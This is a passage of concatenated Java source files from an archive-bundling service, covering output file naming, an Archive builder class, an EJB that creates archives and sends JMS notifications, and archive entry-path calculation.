*/ private FileNameGenerator() { super(PROPERTY_FILE_NAME); String stagingArea = null; pathSeparator = System.getProperty("file.separator"); try { stagingArea = getProperty(STAGING_DIRECTORY_PROPERTY); } catch (PropertiesNotLoadedException pnle) { LOGGER.warn("An unexpected PropertiesNotLoadedException " + "was encountered. Please ensure the application " + "is properly configured. Using value of [ " + "java.io.tmpdir" + " ] for staging area. Exception message => [ " + pnle.getMessage() + " ]."); } setStagingArea(stagingArea); } /** * Alternate constructor allowing clients to specify the ArchiveType on * construction. The other required parameters (job ID and file name) * will be default values. * * @param type The archive type. */ public FileNameGenerator(ArchiveType type) { this(); setArchiveType(type); setJobID(null); setTemplateName(null); } /** * Alternate constructor allowing clients to specify the ArchiveType and * job ID on construction. The other required parameters (file name) * will be default values. * * @param type The archive type. * @param jobID The job ID to utilize. */ public FileNameGenerator(ArchiveType type, String jobID) { this(); setArchiveType(type); setJobID(jobID); setTemplateName(null); } /** * Alternate constructor allowing clients to specify the ArchiveType, * job ID, and file name on construction. * * @param type The archive type. * @param jobID The job ID to utilize. * @param fileName The template to use when generating the output file name. */ public FileNameGenerator(ArchiveType type, String jobID, String fileName) { this(); setArchiveType(type); setJobID(jobID); setTemplateName(fileName); } /** * Public method used to return the name of the target output directory. * @return The output directory path. 
*/ public URI getOutputDirectory() { StringBuilder sb = new StringBuilder(); sb.append(stagingArea); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } sb.append(jobID); return getURI(sb.toString()); } /** * Public method used to generate the URI of the target output file. * * @param ID The archive ID. * @return The URI of the output filename. */ public URI getOutputFile(int ID) { StringBuilder sb = new StringBuilder(); sb.append(stagingArea); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } if (!jobID.isEmpty()) { sb.append(jobID); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } } sb.append(filenameTemplate); if (ID > 0) { sb.append("_"); sb.append(ID); } sb.append("."); sb.append(type.getText().toLowerCase()); return getURI(sb.toString()); } /** * Get the default name of the archive file to use. * * @return The archive filename. */ public static String getFileName() { StringBuilder sb = new StringBuilder(); sb.append(DEFAULT_FILENAME_PREFIX); sb.append("_data_archive"); return sb.toString(); } /** * Create a full URI based on an input String-based file path. * * @param filePath Path to a target file. * @return Associated URI to the same target file. * @throws FileNotFoundException Thrown if the target file does not exist. * @throws FileSystemNotFoundException Thrown if the input URI resides on * a file system that is not available. */ private URI getURI(String filePath) throws FileSystemNotFoundException { URI uri = null; if ((filePath != null) && (!filePath.isEmpty())) { uri = URIUtils.getInstance().getURI(filePath); } else { LOGGER.warn("Input file path is null. Unable to create URI."); } return uri; } /** * Generate the staging directory from the JVM properties information. * @return A staging directory on the local server. 
*/ private String genStagingAreaFromJVM () { StringBuilder sb = new StringBuilder(); sb.append("file://"); sb.append(System.getProperty("java.io.tmpdir")); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } return sb.toString(); } /** * Setter method for the archive type. * @param type The output archive type. */ private void setArchiveType(ArchiveType type) { if (type == null) { type = ArchiveType.ZIP; } else { this.type = type; } } /** * Setter method for the template name used for output archive files. * @param value The user-supplied template filename. */ private void setTemplateName(String value) { if ((value == null) || (value.isEmpty())) { filenameTemplate = getFileName(); } else { // Take whatever the user requested and strip off the extension. if (value.contains(".")) { filenameTemplate = value.substring(0, value.lastIndexOf('.')); } else { filenameTemplate = value; } } } /** * Setter method for the job ID field. Modified to allow for a "empty" * value for the job ID. If the job ID is empty the output files will * be written directly to the staging area. * @param value The job ID. */ private void setJobID(String value) { if (value == null) { jobID = JobIDGenerator.generateUniqueToken(2*UNIQUE_TOKEN_LENGTH); } else { jobID = value; } } /** * Public method used to set the target staging area. This was modified * to allow public access in the event offline tools want to specify an * output location other than default staging area. * * @param value The value of the staging area retrieved from the * properties file. */ public void setStagingArea(String value) { StringBuilder sb = new StringBuilder(); if ((value == null) || (value.isEmpty())) { sb.append(genStagingAreaFromJVM()); } else { sb.append(value); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } } stagingArea = sb.toString(); } /** * Print out the parameters that will be utilized in constructing * the output file names. 
*/ public String toString() { StringBuilder sb = new StringBuilder(); sb.append("FileNameGenerator Parameters : "); sb.append("Archive Type => [ "); sb.append(type.getText()); sb.append(" ], Job ID => [ "); sb.append(jobID); sb.append(" ], filename template => [ "); sb.append(filenameTemplate); sb.append(" ], staging area => [ "); sb.append(stagingArea); sb.append(" ]."); return sb.toString(); } public static void main (String[] args) { FileNameGenerator generator = new FileNameGenerator(ArchiveType.BZIP2); System.out.println(generator.getOutputDirectory()); System.out.println(generator.getOutputFile(0)); System.out.println(generator.getOutputFile(1)); System.out.println(generator.getOutputFile(2)); generator = new FileNameGenerator(ArchiveType.ZIP, "", "test_output_archive"); generator.setStagingArea("/mnt/public/data_bundles/test"); System.out.println(generator.getOutputDirectory()); System.out.println(generator.getOutputFile(0)); System.out.println(generator.getOutputFile(1)); System.out.println(generator.getOutputFile(2)); generator = new FileNameGenerator(ArchiveType.TAR, "ABCDEFGHIJKLMNOPQRSTUV"); System.out.println(generator.getOutputDirectory()); System.out.println(generator.getOutputFile(0)); System.out.println(generator.getOutputFile(1)); System.out.println(generator.getOutputFile(2)); generator = new FileNameGenerator(ArchiveType.ZIP, "ABCDEFGHIJKLMNOPQRSTUV", "test_output_archive"); System.out.println(generator.getOutputDirectory()); System.out.println(generator.getOutputFile(0)); System.out.println(generator.getOutputFile(1)); System.out.println(generator.getOutputFile(2)); } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/model/Archive.java package mil.nga.bundler.model; import java.io.Serializable; import java.net.URI; import java.util.ArrayList; import java.util.List; import mil.nga.bundler.types.ArchiveType; /** * Simple POJO class holding data that would be required to create a single * output Archive file. 
This is the simple version of the POJO. * * @author <NAME> * */ public class Archive implements Serializable { /** * Eclipse-generated serialVersionUID */ private static final long serialVersionUID = -1399261864675805467L; /** * The list of files that will be included in the output archive file. */ private final List<ArchiveElement> elementList; /** * The archive ID. */ private final int id; /** * The name of the output archive file. */ private final URI outputFile; /** * The type of output archive to generate. */ private final ArchiveType type; /** * Constructor enforcing the Builder design pattern. * * @param builder Builder class implementing type checking. */ public Archive(ArchiveBuilder builder) { elementList = builder.elementList; id = builder.id; outputFile = builder.outputFile; type = builder.type; } /** * Getter method for the list of files that will be included in the output * archive file. * * @return The list of files to include in the output archive. */ public List<ArchiveElement> getElementList() { return elementList; } /** * Getter method for the archive ID. * @return The archive ID */ public long getID() { return id; } /** * Getter method for the full path to the target output file. * * @return The target output archive file. */ public URI getOutputFile() { return outputFile; } /** * Getter method for the type of archive to create. * * @return The type of archive to create. */ public ArchiveType getType() { return type; } public String toString() { StringBuilder sb = new StringBuilder(); sb.append("Archive: ID => [ "); sb.append(getID()); sb.append(" ], type => [ "); sb.append(getType().getText()); sb.append(" ], output file => [ "); sb.append(getOutputFile().toString()); sb.append(" ]."); return sb.toString(); } /** * Class implementing the Builder creation pattern for new * ArchiveElement objects. 
* * @author <NAME> */ public static class ArchiveBuilder { private List<ArchiveElement> elementList = new ArrayList<ArchiveElement>(); private int id = 0; private URI outputFile; private long size = 0; private ArchiveType type; /** * Method used to actually construct the BundlerJobMetrics object. * @return A constructed and validated BundlerJobMetrics object. */ public Archive build() throws IllegalStateException { Archive object = new Archive(this); validateArchiveObject(object); return object; } /** * Getter method for the estimated size of the output archive. * @return The estimated size of the output archive. */ public long getSize() { return size; } /** * Add an <code>ArchiveElement</code> to the internal list of elements. * * @param value * @return Reference to the parent builder object. */ public ArchiveBuilder element(ArchiveElement value, long size) { if (value != null) { elementList.add(value); } this.size += size; return this; } /** * Add an entire list to the POJO. * * @param value The list to add to the builder. * @return Reference to the parent builder object. */ public ArchiveBuilder elementList(List<ArchiveElement> value) { if ((value != null) && (!value.isEmpty())) { elementList = value; } return this; } /** * The ID associated with the archive. * * @param value The ID associated with the archive. * @return Reference to the parent builder object. */ public ArchiveBuilder id(int value) { id = value; return this; } /** * The output file to create. * * @param value The output file to create. * @return Reference to the parent builder object. */ public ArchiveBuilder outputFileName(URI value) { outputFile = value; return this; } /** * Add an <code>ArchiveElement</code> to the internal list of elements. * * @param value * @return Reference to the parent builder object. */ public ArchiveBuilder type(ArchiveType value) { type = value; return this; } /** * Validate that all required fields are populated. 
* * @param object The ArchiveElement object to validate. * @throws IllegalStateException Thrown if any of the required fields * are not populated. */ public void validateArchiveObject(Archive object) throws IllegalStateException { if (object.getID() < 0) { throw new IllegalStateException ("Invalid archive ID [ " + object.getID() + " ]."); } if ((object.getElementList() == null) || (object.getElementList().isEmpty())) { throw new IllegalStateException ("List of elements to archive " + "is null or empty."); } if (object.getOutputFile() == null) { throw new IllegalStateException ("Invalid value for output " + "file URI [ null ]."); } if (object.getType() == null) { throw new IllegalStateException ("Invalid value for output " + "archive type [ null ]."); } } } } <file_sep>/parent/BundlerEJB/src/main/java/mil/nga/bundler/ejb/BundlerService.java package mil.nga.bundler.ejb; import java.io.IOException; import java.net.URI; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import javax.ejb.Asynchronous; import javax.ejb.EJB; import javax.ejb.LocalBean; import javax.ejb.Stateless; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.bundler.archive.ArchiveFactory; import mil.nga.bundler.exceptions.ArchiveException; import mil.nga.bundler.exceptions.ServiceUnavailableException; import mil.nga.bundler.exceptions.UnknownArchiveTypeException; import mil.nga.bundler.interfaces.BundlerConstantsI; import mil.nga.bundler.interfaces.BundlerI; import mil.nga.bundler.messages.ArchiveMessage; import mil.nga.bundler.model.ArchiveElement; import mil.nga.bundler.model.ArchiveJob; import mil.nga.bundler.model.FileEntry; import mil.nga.bundler.types.JobStateType; import mil.nga.util.FileUtils; import mil.nga.util.URIUtils; /** * Session Bean implementation class BundlerService */ @Stateless @LocalBean public class BundlerService extends NotificationService implements BundlerConstantsI { 
/** * Set up the Log4j system for use throughout the class */ static final Logger LOGGER = LoggerFactory.getLogger(BundlerService.class); /** * Maximum number of times to attempt to read the archive data from the * backing data source. */ private static final int MAX_ATTEMPTS = 5; /** * The amount of times to wait between database read attempts. */ private static final long WAIT_TIME = 5000; /** * Container-injected reference to the JobService EJB. */ @EJB ArchiveJobService archiveJobService; /** * Container-injected reference to the HashGenerator service. */ @EJB HashGeneratorService hashGeneratorService; /** * Container-injected reference to the FileCompletionListener service. */ @EJB FileCompletionListener fileCompletionlistener; /** * Default constructor. */ public BundlerService() { } /** * Method introduced to attempt to work around some latency issues with * JPA flushing data to the backing data store for use by other nodes in * the cluster. * * @param jobID The job ID to process. * @param archiveID The ID of the archive to process. * * @return The <code>ArchiveJob</code> to process. May be null if the * data is not available. */ private ArchiveJob getArchiveJob(String jobID, long archiveID) throws ServiceUnavailableException { int counter = 0; ArchiveJob archive = getArchiveJobService() .getArchiveJob(jobID, archiveID); // We have run into situations where the JPA subsystem has not // flushed all of the data out to the backing data store at this // point in processing. Additional logic has been inserted // here to perform multiple attempts before failing the job. if (archive == null) { while ((counter < MAX_ATTEMPTS) && (archive == null)) { LOGGER.info("Unable to find archive to process for " + "job ID [ " + jobID + " ] and archive ID [ " + archiveID + " ]. 
Attempt number [ " + (counter + 1) + " ] out of a maximum of [ " + MAX_ATTEMPTS + " ] attempts."); try { Thread.sleep(WAIT_TIME); } catch (InterruptedException ie) { LOGGER.debug("Unexpected InterruptedException raised " + "while pausing execution. Exception " + "=> [ " + ie.getMessage() + " ]."); } archive = getArchiveJobService() .getArchiveJob(jobID, archiveID); counter++; } } return archive; } /** * Method driving the creation of the output archive file. * * @param job The managed JPA job object. * @param archive Archive job to run. */ private void createArchive(String jobID, long archiveID) throws ArchiveException, IOException { long startTime = System.currentTimeMillis(); try { ArchiveJob archive = getArchiveJob(jobID, archiveID); if (archive != null) { // Get the concrete instance of the archiver that will be // used to construct the output archive file. ArchiveFactory factory = ArchiveFactory.getInstance(); // Get the concrete Bundler object. BundlerI bundler = factory.getBundler(archive.getArchiveType()); // Set up the listener for the completion of individual file // archives. This was added at the request of the MPSU team and // may need to be removed if too much of an impact to // performance. FileCompletionListener listener = getFileCompletionListener(); if (listener != null) { listener.setJobID(jobID); listener.setArchiveID(archiveID); bundler.addFileCompletionListener(listener); } // Here's where the magic happens. bundler.bundle( getArchiveElements(archive.getFiles()), URIUtils.getInstance().getURI(archive.getArchive())); // Generate the hash file associated with the output archive. if (getHashGeneratorService() != null) { getHashGeneratorService().generate( archive.getArchive(), archive.getHash()); } else { LOGGER.warn("Unable to obtain a reference to the " + "HashGenerator EJB. Unable to create the output " + "hash file associated with job ID [ " + archive.getJobID() + " ] and archive ID [ " + archiveID + " ]. 
Since few, if any, customers actually use " + "the hash for anything we just issue a warning " + "and proceed with processing."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Archive processing for job ID [ " + jobID + " ] and archive ID [ " + archiveID + " ]. Completed in [ " + (System.currentTimeMillis() - startTime) + " ] ms."); } } else { LOGGER.error("Unable to find archive to process for " + "job ID [ " + jobID + " ] and archive ID [ " + archiveID + " ]. The maximum number of tries [ " + MAX_ATTEMPTS + " ] were exceeded."); } } catch (ServiceUnavailableException sue) { LOGGER.error("Internal system failure. Target EJB service " + "is unavailable. Exception message => [ " + sue.getMessage() + " ]."); } catch (UnknownArchiveTypeException uate) { // We should never see this exception here. However, we will log // it as there must a programming error. LOGGER.error("Unexpected UnknownArchiveException raised while " + "actually creating the output archive. This sitation " + "should have been caught much earlier than here. " + "Exception message => [ " + uate.getMessage() + " ]."); } } /** * Map the input list of <code>FileEntry</code> objects to an output list of * <code>ArchiveElement</code> objects to pass into the bundler algorithm. * * @param files A list of <code>FileEntry</code> objects to bundle. * @return a list containing <code>ArchiveElement</code> objects. The * output may be empty, but it will not be null. */ public List<ArchiveElement> getArchiveElements(List<FileEntry> files) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((files != null) && (files.size() > 0)) { for (FileEntry file : files) { elements.add(new ArchiveElement.ArchiveElementBuilder() .size(file.getSize()) .entryPath(file.getEntryPath()) .uri(URIUtils.getInstance() .getURI(file.getFilePath())) .build()); } } else { LOGGER.warn("Input list of FileEntry objects is null or empty. 
" + "Output list will also be empty."); } return elements; } /** * Private method used to obtain a reference to the target EJB. * * Method implemented because JBoss EAP 6.x was inexplicably NOT always * injecting the EJB (i.e. EJB reference was null) * * @return Reference to the FileCompletionListener EJB. */ private FileCompletionListener getFileCompletionListener() { if (fileCompletionlistener == null) { LOGGER.warn("Application container failed to inject the " + "reference to FileCompletionListener. Attempting to " + "look it up via JNDI."); fileCompletionlistener = EJBClientUtilities .getInstance() .getFileCompletionListener(); } return fileCompletionlistener; } /** * Private method used to obtain a reference to the target EJB. * * Method implemented because JBoss EAP 6.x was inexplicably NOT always * injecting the EJB (i.e. EJB reference was null) * * @return Reference to the HashGeneratorService EJB. * @throws ServiceUnavailableException Thrown if we are unable to obtain * a reference to the target EJB. */ private HashGeneratorService getHashGeneratorService() throws ServiceUnavailableException { if (hashGeneratorService == null) { LOGGER.warn("Application container failed to inject the " + "reference to HashGeneratorService. Attempting to " + "look it up via JNDI."); hashGeneratorService = EJBClientUtilities .getInstance() .getHashGeneratorService(); if (hashGeneratorService == null) { throw new ServiceUnavailableException("Unable to obtain a " + "reference to [ " + HashGeneratorService.class.getCanonicalName() + " ]."); } } return hashGeneratorService; } /** * Private method used to obtain a reference to the target EJB. * * Method implemented because JBoss EAP 6.x was inexplicably NOT always * injecting the EJB (i.e. EJB reference was null) * * @return Reference to the JobService EJB. * @throws ServiceUnavailableException Thrown if we are unable to obtain * a reference to the target EJB. 
*/ private ArchiveJobService getArchiveJobService() throws ServiceUnavailableException { if (archiveJobService == null) { LOGGER.warn("Application container failed to inject the " + "reference to ArchiveJobService. Attempting to " + "look it up via JNDI."); archiveJobService = EJBClientUtilities .getInstance() .getArchiveJobService(); if (archiveJobService == null) { throw new ServiceUnavailableException("Unable to obtain a " + "reference to [ " + JobFactoryService.class.getCanonicalName() + " ]."); } } return archiveJobService; } /** * * Note: This method was added to handle very large bundle requests. * We found that if the bundle process took longer than 5 minutes the * JMS system would re-issue the message. * * @param message Message indicating which Job ID/Archive ID to process. */ @Asynchronous public void handleMessage(ArchiveMessage message) { JobStateType endState; int counter = 0; try { ArchiveJob archiveJob = getArchiveJob( message.getJobId(), message.getArchiveId()); if (archiveJob != null) { // Update the archive to reflect that archive processing // has started. archiveJob.setHostName(FileUtils.getHostName()); archiveJob.setServerName( EJBClientUtilities.getInstance().getServerName()); archiveJob.setStartTime(System.currentTimeMillis()); archiveJob.setArchiveState(JobStateType.IN_PROGRESS); getArchiveJobService().update(archiveJob); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Creating output archive file for " + "job ID [ " + archiveJob.getJobID() + " ] and archive ID [ " + archiveJob.getArchiveID() + " ]."); } try { createArchive(message.getJobId(), message.getArchiveId()); endState = JobStateType.COMPLETE; } catch (IOException ioe) { LOGGER.error("Unexpected IOException raised while " + "creating the output archive. Archive " + "state will be set to ERROR for job ID [ " + message.getJobId() + " ] archive ID [ " + message.getArchiveId() + " ]. 
Error message [ " + ioe.getMessage() + " ]."); endState = JobStateType.ERROR; } catch (ArchiveException ae) { LOGGER.error("Unexpected ArchiveException raised " + "while " + "creating the output archive. Archive " + "state will be set to ERROR for job ID [ " + message.getJobId() + " ] archive ID [ " + message.getArchiveId() + " ]. Error message [ " + ae.getMessage() + " ]."); endState = JobStateType.ERROR; } // The status of the ARCHIVE_JOB has changed due to the // implementation of the FileCompletionListener. Go get // the latest ARCHIVE_JOB from the data store. archiveJob = getArchiveJobService().getArchiveJob( message.getJobId(), message.getArchiveId()); if (archiveJob != null) { archiveJob.setArchiveState(endState); // Update the end time. archiveJob.setEndTime(System.currentTimeMillis()); // Go get the final size of the output archive. archiveJob.setSize(getArchiveFileSize( archiveJob.getArchive())); // Ensure the ArchiveJob is updated in the backing data store. getArchiveJobService().update(archiveJob); } else { LOGGER.error("Unable to retrieve the ArchiveJob object " + "for job ID [ " + message.getJobId() + " ] and archive ID [ " + message.getArchiveId() + " ] from the data store. Archive job status will " + "not be updated here. Will attempt to update " + "the status on notification."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Archive complete. Sending " + "notification message file for " + "archive with job ID [ " + message.getJobId() + " ] and archive ID [ " + message.getArchiveId() + " ]."); } notify(message.getJobId(), message.getArchiveId()); } else { LOGGER.error("Unable to find an ARCHIVE_JOB matching " + "archive message parameters => [ " + message.toString() + " ]."); } } catch (ServiceUnavailableException sue) { LOGGER.error("Internal system failure. Target EJB service " + "is unavailable. Exception message => [ " + sue.getMessage() + " ]."); } } /** * Simple method used to retrieve the size of the created archive file. 
* * @param archive The completed Archive object. */ private long getArchiveFileSize(String archive) { long size = 0L; if ((archive != null) && (!archive.isEmpty())) { URI output = URIUtils.getInstance().getURI(archive); Path p = Paths.get(output); if (Files.exists(p)) { try { size = Files.size(p); } catch (IOException ioe) { LOGGER.error("Unexpected IOException while attempting " + "to obtain the size associated with file [ " + output.toString() + " ]. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.error("The expected output archive file [ " + archive + " ] does not exist."); } } else { LOGGER.error("The identified output archive file is null or " + "empty. The final output archive size will not be " + "set."); } return size; } /** * This method is used to notify the Tracker MDB that the processing * associated with a single Archive has completed. The JPA Archive * object is wrapped in an ObjectMessage and then placed on the * appropriate JMS Queue. * * @param archive The JPA Archive containing information associated with * the output files created. 
*/ private void notify(String jobID, long archiveID) { ArchiveMessage archiveMsg = new ArchiveMessage.ArchiveMessageBuilder() .jobId(jobID) .archiveId(archiveID) .build(); if (LOGGER.isDebugEnabled()) { LOGGER.info("Placing the following message on " + "the JMS queue [ " + archiveMsg.toString() + " ]."); } super.notify(TRACKER_DEST_Q, archiveMsg); } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/EntryPathFactory.java package mil.nga.bundler; import java.io.File; import java.net.URI; import java.nio.file.Path; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import java.util.Properties; import java.util.regex.Pattern; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.PropertyLoader; import mil.nga.bundler.exceptions.PropertiesNotLoadedException; import mil.nga.bundler.interfaces.BundlerConstantsI; /** * The "entry path" is the path (or location) within an output archive where * a target file is stored. The basic algorithm implemented executes the * following steps: * * 1. We strip off everything but the absolute file path. * 2. Once we have the absolute path to an output file, we strip off any pre- * defined path prefixes that were included in the properties file. * 3. Next, we ensure that the output file entry is not over 100 characters. * If it's longer than 100 characters, we start eliminating path elements * from the front. If we eliminate all the path entries and it's still * longer than 100 characters, we truncate the filename keeping the * extension (if it contains an extension). * * @author <NAME> */ public class EntryPathFactory extends PropertyLoader implements BundlerConstantsI { /** * An output entry path cannot be longer than 100 characters. 
*/ public static final int ENTRY_PATH_LENGTH_LIMIT = 100; /** * Set up the Log4j system for use throughout the class */ static final Logger LOGGER = LoggerFactory.getLogger( EntryPathFactory.class); /** * List of path prefixes to exclude */ private List<String> prefixExclusions = null; /** * Private constructor that forces the singleton design pattern and * loads any relevant properties from an external file. */ private EntryPathFactory() { super(PROPERTY_FILE_NAME); try { loadPrefixMap(getProperties()); } catch (PropertiesNotLoadedException pnle) { LOGGER.warn("An unexpected PropertiesNotLoadedException " + "was encountered. Please ensure the application " + "is properly configured. Exception message [ " + pnle.getMessage() + " ]."); } } /** * Alternate private constructor added to support jUnit testing. This * constructor allows clients to supply a Properties object as opposed * to loading an external properties file. * * @param props Populated properties file. */ private EntryPathFactory(Properties props) { if (props != null) { loadPrefixMap(props); } else { LOGGER.warn("Input Properties object is null."); } } /** * Method used to load the List of path prefixes that are to be excluded * from the entry path that will exist in the output archive file. * * @param props Populated properties file. */ private void loadPrefixMap(Properties props) { if (props != null) { if (prefixExclusions == null) { prefixExclusions = new ArrayList<String>(); } for (int i=0; i<MAX_NUM_EXCLUSIONS; i++) { String exclusion = props.getProperty( PARTIAL_PROP_NAME + Integer.toString(i).trim()); if ((exclusion != null) && (!exclusion.isEmpty())) { prefixExclusions.add(exclusion); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Found prefix exclusion [ " + exclusion + " ] in property [ " + PARTIAL_PROP_NAME + Integer.toString(i).trim() + " ]."); } } } } else { LOGGER.error("Input Properties object is null. 
No prefix " + "exclusions loaded."); } } /** * This method enforces the 100-character limit for the entry path. * * @param path The input candidate entry path. * @return An entry path conforming to the length limitation. */ public String enforceLengthLimit(String path) { String limitedPath = path; if ((limitedPath != null) && (!limitedPath.isEmpty())) { if (limitedPath.length() > ENTRY_PATH_LENGTH_LIMIT) { do { if (limitedPath.contains("/")) { limitedPath = limitedPath.substring(limitedPath.indexOf("/")+1); } else { limitedPath = truncateFilename(limitedPath); } } while (limitedPath.length() > ENTRY_PATH_LENGTH_LIMIT); } } return limitedPath; } /** * Extract and return the extension from the input file path. * @param path The input file path. * @return The extension (with the "." separator) */ public String getExtension(String path) { String extension = ""; if ((path == null) || (path.isEmpty())) { return extension; } int dotPos = path.lastIndexOf("."); if ( dotPos < 0 ) return extension; int dirPos = path.lastIndexOf( File.separator ); if ( dirPos < 0 && dotPos == 0 ) return extension; if ( dirPos >= 0 && dirPos > dotPos ) return extension; extension = path.substring(dotPos); return extension; } /** * Check to see if the input file path contains a file extension. * * @param path A full file path. * @return True if the file contains an extension, false otherwise. */ public static boolean hasExtension(String path) { if ((path == null) || (path.isEmpty())) { return false; } int dotPos = path.lastIndexOf("."); if ( dotPos < 0 ) return false; int dirPos = path.lastIndexOf( File.separator ); if ( dirPos < 0 && dotPos == 0 ) return false; if ( dirPos >= 0 && dirPos > dotPos ) return false; return true; } /** * String manipulation function to remove any extensions from the input * archive file designator. The archiver classes will add an extension * based on the type of archive that was requested. * * @param path The full path to the output archive file. 
* @return The path sans extensions. */ private String removeExtension(String path) { int dotPos = path.lastIndexOf("."); if (dotPos < 0) { return path; } int dirPos = path.lastIndexOf(File.separator); if ((dirPos < 0) && (dotPos == 0)) { return path; } if ((dirPos >= 0) && (dirPos > dotPos)) { return path; } return path.substring(0, dotPos); } /** * This method does the heavy lifting associated with stripping off any * configured prefixes and ensuring the output entry path does not start * with a file separator character. * * @param path The actual file path. * @return The calculated entry path. */ private String stripPredefinedExclusions(String path) { String entryPath = path; if ((prefixExclusions != null) && (prefixExclusions.size() > 0)) { for (String exclusion : prefixExclusions) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Testing for exclusion [ " + exclusion + " ]."); } if (entryPath.startsWith(exclusion)) { entryPath = entryPath.replaceFirst(Pattern.quote(exclusion), ""); } } } else { LOGGER.warn("There are no prefix exclusions available to apply " + "to the input File path."); } // Ensure the path does not start with a path separator character. if (entryPath.startsWith(System.getProperty("file.separator"))) { entryPath = entryPath.replaceFirst(Pattern.quote( System.getProperty("file.separator")), ""); } return entryPath; } /** * Method used to truncate an input filename down to the required 100 * character limit. * * @param path The candidate path. * @return The truncated filename. */ public String truncateFilename(String path) { String truncated = removeExtension(path); String extension = getExtension(path); truncated = truncated.substring( 0, ENTRY_PATH_LENGTH_LIMIT - extension.length()); return truncated + extension; } /** * Calculate the entry path associated with the input String-based * absolute path to a target file. * * @param path The String based absolute path. * @return The String-based entry path. 
*/ public String getEntryPath(String path) { String entryPath = null; if ((path != null) && (!path.isEmpty())) { entryPath = stripPredefinedExclusions(path); entryPath = enforceLengthLimit(entryPath); } return entryPath; } /** * Calculate the entry path associated with the input URI. Only the * absolute path (not the scheme, host, etc.) is included in the * calculation of the entry path. * * @param uri URI of the target file. * @return The String-based entry path. */ public String getEntryPath(URI uri) { String entryPath = null; if ((uri != null) && (uri.getPath() != null) && (!uri.getPath().isEmpty())) { entryPath = getEntryPath(uri.getPath()); } else { LOGGER.warn("Invalid URI. Unable to retrieve the absolute path " + "from the target URI."); } return entryPath; } /** * Calculate the entry path associated with the input URI. Only the * absolute path (not the scheme, host, etc.) is included in the * calculation of the entry path. * * @param uri URI of the target file. * @param replacementPath The string to use to replace the full path. * @return The String-based entry path. */ public String getEntryPath(URI uri, String replacementPath) { StringBuilder entryPath = new StringBuilder(); if ((uri != null) && (uri.getPath() != null) && (!uri.getPath().isEmpty())) { Path p = Paths.get(uri); if ((replacementPath == null) || (replacementPath.isEmpty())) { entryPath.append(p.getFileName()); } else { entryPath.append(replacementPath); if (!entryPath.toString().endsWith(File.separator)) { entryPath.append(File.separator); } entryPath.append(p.getFileName()); } } else { LOGGER.warn("Invalid URI. Unable to retrieve the absolute path " + "from the target URI."); } return entryPath.toString(); } /** * This ugly method is used to calculate the entry path within the output * archive for files that were identified by searching through nested * directories. The basic algorithm is that the base directory is * excluded (i.e. eliminated) from the absolute path. 
The archivePath * (if supplied) is then prepended to what is left of the absolute path. * * @param baseDir The base directory which was the starting point for * the file search that resulted in the absolutePath. * @param archivePath The user-supplied archivePath. * @param absolutePath The absolute path to a single file. * @return The entry path for a single file. */ public String getEntryPath( URI uri, String baseDir, String archivePath) { String entryPath = null; if ((uri != null) && (uri.getPath() != null) && (!uri.getPath().isEmpty())) { entryPath = uri.getPath(); if ((entryPath != null) && (!entryPath.isEmpty())) { // treat the baseDir as an exclusion from the absolute path. if ((baseDir != null) && (!baseDir.isEmpty())) { // Treat the baseDir as an exclusion if (entryPath.startsWith(baseDir)) { entryPath = entryPath.replaceFirst( Pattern.quote(baseDir), ""); } } // If the archive path is supplied, append it to whatever is // left over. if ((archivePath != null) && (!archivePath.isEmpty())) { // Make sure the current entryPath doesn't start with a // file separator char. This ensures there are not // duplicate file separator characters. if (entryPath.startsWith("/")) { entryPath = entryPath.replaceFirst( Pattern.quote("/"), ""); } // Make sure the archivePath doesn't end with a file // separator char this ensures there are not duplicates. if (archivePath.endsWith("/")) { archivePath = archivePath.substring( 0, archivePath.length()-1); } entryPath = archivePath+"/"+entryPath; } } else { LOGGER.warn("Unable to extract file path from URI. URI " + "provided [ " + uri.toString() + " ]."); } } else { LOGGER.warn("Invalid URI. Unable to retrieve the absolute path " + "from the target URI."); } return getEntryPath(entryPath); } /** * Getter method for the prefix exclusions that were read from the input * Properties object. * @return A list of Strings to exclude from the calculated entry paths. 
*/ public List<String> getPrefixExclusions() { return prefixExclusions; } /** * Getter method for the singleton instance of the EntryPathFactory. * @return Handle to the singleton instance of the EntryPathFactory. */ public static EntryPathFactory getInstance() { return EntryPathFactoryHolder.getFactorySingleton(); } /** * Getter method for the singleton instance of the EntryPathFactory. * @return Handle to the singleton instance of the EntryPathFactory. */ public static EntryPathFactory getInstance(Properties props) { return new EntryPathFactory(props); } /** * Static inner class used to construct the factory singleton. This * class exploits that fact that inner classes are not loaded until they * referenced therefore enforcing thread safety without the performance * hit imposed by the use of the "synchronized" keyword. * * @author <NAME> */ public static class EntryPathFactoryHolder { /** * Reference to the Singleton instance of the factory */ private static EntryPathFactory factory = null; /** * Accessor method for the singleton instance of the factory object. * @return The singleton instance of the factory. */ public static EntryPathFactory getFactorySingleton() { if (factory == null) { factory = new EntryPathFactory(); } return factory; } /** * Accessor method for the singleton instance of the factory object. * @param props Properties object. * @return The singleton instance of the factory. 
